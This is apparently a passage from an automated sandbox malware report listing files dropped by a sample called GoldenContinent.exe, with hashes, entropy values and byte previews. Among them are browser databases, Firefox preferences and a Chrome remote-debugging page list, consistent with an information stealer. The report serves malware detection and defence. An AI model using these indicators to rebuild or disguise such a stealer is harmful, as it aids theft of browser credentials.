                                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                          MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                          SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                          SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                          SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3719100122615275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCVTECufNaoCn3my3mNCn3lfNaoCYIrdCYIDfNaoCnx0UrU0U8Ct:6NnCVTECWNnC35SC3RNnCYIrdCYI7Nnb
                                                                                                                                                                                                                                                                          MD5:C045960F621997ED342CDFC7EBEBDB11
                                                                                                                                                                                                                                                                          SHA1:36D5563049F9520BA88045F40924E303F7C4F69E
                                                                                                                                                                                                                                                                          SHA-256:BC70357E633E6F731139540558EB27EB7E521B92818885816D9745288B12DF57
                                                                                                                                                                                                                                                                          SHA-512:FB8DA457C7F1E4F86F4442C25EF5AA5121D2DE66D976D16E2C1F7EC263ACC37407B9134FC7C2EAACD2861239A04A23124704D63527CA80DA1EAC4701CB8789B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A687C6E07DD6320060B3070153ED1433",.. "id": "A687C6E07DD6320060B3070153ED1433",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A687C6E07DD6320060B3070153ED1433"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6E7F08B280D57AD159B18D95F162B2DF",.. "id": "6E7F08B280D57AD159B18D95F162B2DF",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6E7F08B280D57AD159B18D95F162B2DF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):291978
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999288207292689
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:6uNvO43f2hch0RgL/GXE2cIlOa9NYtxtLJoN6vO7iDbsn:53f2hmP/dK4mu1LJG+Qn
                                                                                                                                                                                                                                                                          MD5:F4EAEF20D7CB249C38BD71E18BEB5C75
                                                                                                                                                                                                                                                                          SHA1:D61CAC3B42D1EB9D6AAF2AC579FA7DFB1D8D5DF5
                                                                                                                                                                                                                                                                          SHA-256:128AAE5CA769C545558DE704B2DA34FF4B3A0F9A1C8637D108A4BC68235C3691
                                                                                                                                                                                                                                                                          SHA-512:D2ECE85D86B64FF9AE2BA3992621773FCC9069CE8B4855D6D75727D594587DD96DF64D307B5F77BA9382DBC4675729EB9330B60DB3ECC651F0A0DD9BD470673D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:|1.[...-..."..%yb~.B....vA...=..@&.e.v.....3.s..i......`=+....Y..R......e....U.-[BN*.v9....... x...D.M.....p.Z+...Z8[........no...n.?.2..9.j...N,...;R.!f..........$..}.....s..Jv.QR..R.L.F.|.......*.X...H.....k}^.l.sb...}m..r.*.."HK...d.. F.g:.L9..;.r9R{.2'....H.#1S.'.X..g.2x.9..o.......<.3*k\.....I..........B.U4.I..8..9.s$~%.y..lRV.Z}.~7zW....6.R...!..*.....KT$.J.Y~.l..Jo.]....&%..1.J0.l.p.+h.L.....C......gh..%/rK.*.M..(f.d...A.....m.Z.rc.:.......3...M.z..K.`%...."...f...#y.}....(B...R.].&...pQ.`...uD1...../...kX8.b.s`Pu_R|.'........8.[-M.l.......w?....ml>D.......H=U^VF.i..?../QK?.$..T....T@.j.W|}.t|..\....-............>......0...'..d..........~.....j/...E.f*.....|3R..FM...'.I...:^Qn..YL.........j....#.o...4.h....o*....F..m.(5..W..N:p.n.<..........w.J]9.1....C8.5..W.T....m.D....B^...7.=.Sgz.D..QL.'M."w..n.].5..^W.".X......(.....f..eo;.[..h.w.c.......^2.".....h..tZ..3*.`:..c....81q.#2....'.w.O.B..,7.....+@N..M./m]~7.<..X......tHP......%:..
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):99328
                                                                                                                                                                                                                                                                          Entropy (8bit):6.619834053469571
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:stCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtM:6COMVIPPL/sZ7HS3zcM
                                                                                                                                                                                                                                                                          MD5:041E0A2909F73D050592EE44B6206AEE
                                                                                                                                                                                                                                                                          SHA1:EEF9934E108CB1F535CE0931C38DA705F99F38D2
                                                                                                                                                                                                                                                                          SHA-256:40A2E1BB4E06F36BBE8E447A73337B0F1BEF79AAF290BDBD363A051F361EFE36
                                                                                                                                                                                                                                                                          SHA-512:CB2EF1260FC75B1CA77289F9E581A303D2D461B3886D2EC70AFBEF16B8CC1B6A6BA3EB009EDFC24DF1EACE7E2A59638CF381EEA5351F90ABDE68FCFAE2ED3A27
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:;F,...c.........1L...C....K.]..S"...E........]..E.E..S..M.@P.u.V.u..u...!........tL= ...u%..K...K9.......v#..f.;wt.f.9w..f#........\#....C...C......f.;wt..M..........M.........f;.t...w...)....C.f.<Cw..Ct.f.;x.............U..E...z...;E...q....E.@f.;zP.u.VRQ.M....`...S...!.........."...M....q"...E...........E........E.....+Ft...E......E.......r...........E..M.@P.u....V.u.....1L..u...C. ......E.=......k..........M.E..Ft.E.......H.......E.......9E........E..f.{.v.K...C...E.M........=L6M.........`.........A...d....F...h....Fx..l....F|+Fx....p....E.+Fx....t....E.+Fx....x.....A..E...A..E..E..+.....|.........%.....E.u..E............E........E...`...P..L6M.........'....9!...U..M.E.Y......E.M.E.3.M.....E..s........g........E..$...E........]..........C.=....t.;A................9.....tI.E...H...N$..X..F0..H...............M.@..E....K;E.tf.M.3..F$..A.M....3.].E..C.]..u.f.{.w............... ...M.............E.@P.u.V.u..u..c.......& ...]...........]...C....;M.}..F..<..|.....
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1277
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9221553212309654
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:xNyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VH4a1uq:ryGS9PvCA433C+sCNC1skNkvQfhSHQq
                                                                                                                                                                                                                                                                          MD5:E9FBB8FAC667C2932E012CE1462F1D67
                                                                                                                                                                                                                                                                          SHA1:2EA8BD2FEB443CEFB68B4EA8508FB1924666392B
                                                                                                                                                                                                                                                                          SHA-256:17029A8D3933139B442077A90799F7880770DCE3143B3F27DC6299E526A04AAF
                                                                                                                                                                                                                                                                          SHA-512:B5ACA0065B6C41A12B9D3B5A468C0AAE2AC743D9C0F9D65EFC04059E084B9A3F461356E4130FECA3D16EA854724986E97F66DBDFDFE5080B8F45EE809DBE9A16
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:landing........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Public Key Version 3, Created Sun Jul 12 11:54:22 2026, Unknown Algorithm (0xe6)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):21642
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991498935142536
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:384:IS6J1mL5yYdUztZ/g1uOd3CKbp1/QS/D5S3q7x2iWyNbOzSrxKG9tL6O:IS6JULwztZnOkKlFQQ6q7UINbOzSrxK4
                                                                                                                                                                                                                                                                          MD5:4F7DC35D83ABA1DEBDF610F61D8354EB
                                                                                                                                                                                                                                                                          SHA1:E096C018E27A56DF92597717547F70AF75D0B37D
                                                                                                                                                                                                                                                                          SHA-256:C60FBE3C4A9ECA49B48022E6A2E7BA5D6AB52D70EE1366EFD34CCBA539604543
                                                                                                                                                                                                                                                                          SHA-512:FCF46720F70EB6AD76DE262790BA4590B10EF1CC62A010384A459EBE3511B59FEEFF2351CDE0B32718BA37FAE3BB13C4FFE51153BF345E36A3EDFD27909DA4DA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.v1.jS.n#....9...j.%G.Q?...@.Z+\R..^......uQ.oB.Yh)!.."..d|[..m.y..y.....%HI.......-M}.%..6g95.E{../a.k......'T.N...'.......^H..f..Q.S.....@...:.e..oN..~(6.2..0.h..Q..i..r.|i3...J........t3&P5D......;zf..9.EL@.......R.....j....:8......^ks<.Z...........?..Zy.'.D.)..'.7.k..+.G0.Y...d...x8.C.S.|..R.o...n.o..A..Aq.5.....G.z.......M..`.4+.Y.....(.....LKaC$.I..&G.+v..o...$..6z9.KqJ.9<;.T..'X...[....4.`.I$I.2?...'..8.iVG..,d.w......?v...l.=.!.....F...n%JO1..z.Pm......{.....R(Y.vW...P^d.$......<o.,.U.N^...x.^.....?..b..o6.....@H...'..#0..b.a...^.5.U...l.....".9.x=...G!MC.7....1...t..q.R.].l|..H..l...)\.w.V..c..4.uc.):.c.c...`.1.9....`.....D.e.0.OH...-s.H......gh. sx[.. ...U..2>..........e..q....Fg.h.....:.=d.E.......z.0.q.."...j.{...h.....|.DY~..l.........Z...'g`.....>.^.....T..&!%.C...V....4...z5).G.X..-..K.q.B3.h*=..fdz^....n. ...7.... ...i(..:..o.u..............4...pG<..eT.}.X}[...eJ.....E...I.....\8m....B! ...r_.D...M..T..[.f..;.....p
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):67584
                                                                                                                                                                                                                                                                          Entropy (8bit):6.549914864408983
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:U1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzf:UZg5PXPeiR6MKkjGWoUlJUD
                                                                                                                                                                                                                                                                          MD5:7444BE6FDC34510517B96B373BCE699B
                                                                                                                                                                                                                                                                          SHA1:7F31A4DD2FF289CE6BE7BE3BA634AB918E3A4FB9
                                                                                                                                                                                                                                                                          SHA-256:EAE9EF63F97F313E74B78FA687DAD66D00DF8C8EE3663E5D093727BF92C35E47
                                                                                                                                                                                                                                                                          SHA-512:08BA0324ADFA33C8D547BB0E8D6F107EE331C0F5FDEA67F4A1CF70C0324298429F3D2FBF88D2B0361C6B11134BFAF6E84924F3167A63A8ACF7B6D9420628B198
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../........
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61440
                                                                                                                                                                                                                                                                          Entropy (8bit):7.99714993641924
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:VIKA6oUNewyKIL3GKHgFfWb6Fmqi/2E9jYUM:LoQtypHgFeqiDM
                                                                                                                                                                                                                                                                          MD5:203EAA7C046A7E5C616D72BB500E2525
                                                                                                                                                                                                                                                                          SHA1:F1B8E88E05E2562E148E0B085F01D99735751524
                                                                                                                                                                                                                                                                          SHA-256:5F5EE058B13874AF192318D6F69881B90AC6FEEE483B5D0F7055FD9546D1BA94
                                                                                                                                                                                                                                                                          SHA-512:19FACF262754AAFD90C5A042DE45BBDD4A5315F7DC58A08350D9ED39C83268EEF709A0F168C7215D2197AC358832B75451C4EF70FE73A29BC2638CA8442BAD47
                                                                                                                                                                                                                                                                          Malicious:false
